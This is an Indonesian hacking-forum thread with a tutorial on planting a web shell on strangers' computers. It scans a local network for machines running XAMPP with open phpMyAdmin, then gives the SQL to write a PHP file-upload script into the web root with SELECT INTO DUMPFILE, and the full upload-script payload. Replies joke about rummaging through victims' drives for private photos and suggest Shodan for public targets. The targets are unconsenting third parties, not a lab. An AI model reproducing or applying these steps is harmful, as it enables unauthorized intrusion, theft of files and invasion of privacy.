Indonesian Back|Track Team

Full Version: Inject Backdoor via PhpMyAdmin
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
Pages: 1 2 3
Selamat malam all member IBT, berawal dari praktek tutorial di trheadnya kang @sonyrimawan di http://www.indonesianbacktrack.or.id/for...-5981.html yang hasilnya g menyenangkan bagi ane ( karna ane gagal ) upload failed mulu ....
Ane brangkat ke warung ngutang rokok ama kopi buat temen begindang ... eh begadang maksudnya ....
Yang membuat ane penasara , toh udah masuk ke phpmyadmin masa g bisa ngapa2en ... :3 ( waktu itu ane merasa sedih )

Ane siapin peralatan tempur, berbekalkan sedikit pengetahuan dari install cms di localhost ane bulatkan tekat untuk BISA ... Big Grin

Peralatan tambahan yang ane gunain :

Angry Ip Scanner
Sedikit Script
Shell Backdoor (Disini ane menggunkana shell 3CArmy)

Oke .... pertama kita cari dulu targetnya menggunakan Anggry Ip Scanner :

Set Anggry Ip Scannernya seperti gambar di bawah ini :

Menu tools  >>> Preferences >> Pada tab port tambahkan port yg akan kita scan
berhubung server pada localhost biasanya menggunakan port 80 / 8080 maka settingan punya ane ane buat begindang

Spoiler! :
[Image: Screenshot_from_2015_11_10_23_12_05.png]

kemudian pada tab display pilih yang host with open port only

Spoiler! :
[Image: Screenshot_from_2015_11_10_23_14_29.png]

selanjutnya balik lagi pada menu tool >>>  Fetchers
Pindahkan web detect ke sebelah kiri seperti di gambar

Spoiler! :
[Image: Screenshot_from_2015_11_10_23_22_32.png]



oke , untuk setingan Anggry Ip Scanner nya kelar ...
Selanjutnya sebagai dasar untuk scann, disini ane menggunakan IP ane sendiri , misal IP ane 192.168.52.100

maka pada Angry Ip Scanner ane buat jadi seperti ini :

[spoiler][Image: Screenshot_from_2015_11_10_23_20_10.png]

kemudian scan dan cari yg seperti ini :

Spoiler! :
[Image: Screenshot_from_2015_11_10_23_27_31.png]

yap .. yang port apachenya open tentunya , karna dari situlah kita masuk Big Grin
NB : Tidak semua juga yang bisa , ada yg phpmyadminnya d password , ada yg memang hanya bisa di akses dari localhost/pc korban itu sendiri ( xampp terbaru kalo g salah )

setelah mendapatkan target, buka ip target tersebut di web browser, maka kita akan masuk ke halaman awal web servernya ( xampp, appserv, etc )

Spoiler! :
[Image: Screenshot_from_2015_11_10_23_32_00.png]

oke , disini kita mulai bermain dengan comand sql nya ...

pertama kita buat database baru untuk tempat backdoor yang akan kita masukkan
Quote:create database userform
Spoiler! :
[Image: Screenshot_from_2015_11_10_23_45_01.png]
NB : userform adalah nama database yang ane buat

Kemudian kita buat tabel dan collumnya dengan cara klik pada database yang sudah kita buat kemudian pilih SQL dan masukkan comand :
Quote:CREATE TABLE `userform`.`user` (
`form` longtext not null
) ENGINE = MYISAM ;

klik Go
NB: userform = nama database , user = nama tabel , form = nama column ( silahkan buat sesuka anda ), longtext = jenis data ( ane buat longtext karna script uploadnya lumayan panjang)

selanjutnya kita cek basedir nya dimana dengan comand :
Quote:select @@datadir

pada contoh ini ada di C:\xampp\mysql\data\
Spoiler! :
[Image: Screenshot_from_2015_11_10_23_53_59.png]

artinya target menggunkan xampp , dan dir xampp biasanya di : C:/xampp/htdocs
oke .. selanjutnya masih di tabel user, klik SQL dan masukkan script di bawah ini :
Quote:INSERT INTO `userform`.`user` (
`form`
)
VALUES (
'<title>Upload File</title>
<style type="text/css">
<!--
body,td,th {
color: #0F0;
}
body {
background-color: #999;
}
-->
</style><p>
<form method="POST" action="" enctype="multipart/form-data" >
<input type="file" name="file" />
<input type="submit" value="Upload" />
</form>
<p>
<strong>
<?php
if ($_FILES[''file''] != '''') {
copy($_FILES[''file''][''tmp_name''], $_FILES[''file''][''name'']) or die (''Proses upload Gagal: '');
}else {
die(''Silahkan pilih file'');
}
?>
File berhasil diupload:<br />
Keterangan File:<br />
Nama File: <?php echo $_FILES[''file''][''name'']; ?><br />
Ukuran File: <?php echo $_FILES[''file''][''size''];?> Bytes <br />
Jenis File: <?php echo $_FILES[''file''][''type'']; ?></strong></p>

'
);

itu adalah script buat ngupload file backdoor kita nantinya ...

jika sukses maka akan muncul seperti ini :
Spoiler! :
[Image: Screenshot_from_2015_11_10_23_59_10.png]

Next Step masih di tabel user, buka lagi comand SQL dan masukkan comand :
Quote:select * into dumpfile 'C:/xampp/htdocs/upload.php' from user

NB:
C:/xampp/htdocs/ = dir xampp ( karna korban menggunakan xampp pada tutorial ini )
upload.php = nama file untuk script upload yg kita masukkan tadi pada langkah sebelumnya
from user = from (nama tabel)

Kemudian klik Go

coba buka urlnya : victimip/upload.php
terahir silahkan upload shell anda , untuk akses shell : victimip/namashell.php

Maaf untuk beberapa step terahir g ada gambarnya dikarnakan target ane udah offline . jadi hal ini hanya bisa dilakukan selama target online dan menjalankan server apachenya...

Jika ada yang kurang jelas monggo tanyain ....
Tutorial Created by Black-Ink ...
Salam
nice thread bro... btw targetnya kenapa offline bro, aturan dikasih link2 bagus dulu ke target biar onlinenya lama.. hehehe... pokoknya mantab buat threat ente bro..
kagak tau ane knape die offline ...
wong kenal juga kagak ama targetnye :v
kan nyari target via scanning range IP doangan kang , jadi kalo hoki nemu laptop cewe kan siape tau ada foto anu anu nya :v

#SEGALA BENTUK PENYALAHGUNAAN DARI TUTORIAL INI DILUAR TANGGUNG JAWAB ANE :V
nyah tampilan webshell ane di target yg lain : http://s15.postimg.org/hr7pcguzv/Screens..._24_16.png

tinggal ubek2 smua drivenya kali aja nemu sesuatu :v
ane penasaran sama file atta Vs Okta.mp4 itu bro :v
mungkin bisa ditambahin lagi , untuk bisa upload shell via php myadmin , seorang attacker harus mempunyai root privilagenya , sehingga berhasil upload shellnya Big Grin
nice share om
salam kenal
nice thread, ke depannya bikin artikel lagi yahh... soalnya ane masih perlu banyak belajar untuk ningkatin sikil
nah kalo kita target nya IP Public gimana om? harus cari range IP nya juga atau gimana nih om @x_code
WOw... asik nih buat pelajarn baru...
mantab bng..
cari targetnya bisa pake shodan..

http://www.indonesianbacktrack.or.id/for...61269.html
ini autonya...

rencananya ane pengen buat auto nanem shell in phpmyadmin
Pages: 1 2 3